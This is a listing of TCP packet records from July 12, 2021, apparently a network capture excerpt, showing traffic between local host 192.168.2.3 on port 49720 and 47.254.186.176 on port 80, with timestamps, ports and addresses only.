Jul 12, 2021 10:28:46.377799034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.377823114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.377846003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.377867937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.377883911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.377918005 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378017902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378041983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378063917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378110886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378156900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378406048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378427982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378451109 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378480911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378493071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378520966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378530025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378552914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378580093 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378601074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378617048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378638983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378659964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378671885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378698111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378725052 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378743887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378768921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378791094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378804922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378829002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378850937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.378859997 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.378911018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379373074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379488945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379543066 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379565001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379590034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379637003 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379705906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379729033 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379750967 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379781961 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379812956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379834890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379861116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379868031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379892111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379904032 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379925013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379947901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.379971981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.379980087 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380006075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380032063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380111933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380161047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380268097 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380388975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380414009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380434036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380451918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380480051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380497932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380511999 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380549908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380564928 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380587101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380630970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380904913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380927086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380959034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.380975008 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.380991936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381033897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381238937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381383896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381407976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381429911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381444931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381473064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381510019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381567001 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381587982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381612062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381668091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381702900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381711960 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381771088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381792068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381815910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381823063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381841898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381856918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381870031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381913900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.381942034 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381964922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.381985903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382011890 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382033110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382076025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382102966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382139921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382189035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382195950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382256031 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382662058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382698059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382721901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382745028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382769108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382782936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382808924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382823944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382848978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382859945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382889032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382915974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382931948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.382952929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382976055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.382997990 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383013010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383038044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383059978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383095980 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383145094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383328915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383353949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383375883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383410931 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383438110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383460045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383486986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383508921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383531094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383552074 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.383563042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383590937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.383675098 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384567022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384593964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384618044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384640932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384654045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384682894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384702921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384716988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384725094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384747982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384772062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384792089 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384804010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384828091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384841919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384862900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384886026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384903908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384921074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384943008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384962082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.384974957 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.384998083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385019064 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385026932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385050058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385068893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385093927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385103941 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385128021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385149956 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385164022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385174036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385199070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385221958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385243893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385258913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385315895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385356903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385382891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385453939 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385516882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385540962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385562897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385584116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385608912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385622025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385644913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385670900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385704041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385714054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385931969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385958910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.385982037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.385996103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386022091 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386044979 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386070013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386077881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386097908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386185884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386208057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386230946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386239052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386281013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386313915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386338949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386362076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386383057 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386392117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386410952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386459112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386554003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386600018 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386883974 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386915922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386936903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386955976 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.386967897 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.386989117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387008905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387028933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387042046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387058973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387334108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387358904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387387037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387393951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387434959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387444973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387469053 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387515068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387536049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387557983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387583017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387608051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387614012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387634993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387659073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387667894 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387701988 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387810946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387835026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387856960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387881041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387891054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.387912035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.387943029 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388191938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388215065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388238907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388247967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388269901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388289928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388299942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388323069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388334036 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388355970 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388380051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388401985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388411999 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388432026 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388442039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388464928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388488054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388509035 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388520956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388545036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388557911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.388580084 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388602972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.388633013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389008045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389055014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389084101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389102936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389128923 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389147997 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389167070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389194965 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389209986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389252901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389307022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389333010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389575005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389604092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389630079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389642954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389667988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389688969 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389703035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389728069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389755011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389760971 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389784098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389802933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389822006 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389847994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389873028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389888048 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389916897 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389934063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.389951944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389974117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.389993906 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.390006065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390027046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390052080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.390465021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390506983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390528917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.390547991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390574932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390595913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.390613079 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390638113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390665054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390671015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.390695095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.390710115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391086102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391130924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391149998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391175032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391201019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391217947 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391237020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391263008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391283989 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391299009 CEST	80	49720	47.254.186.176	192.168.2.3
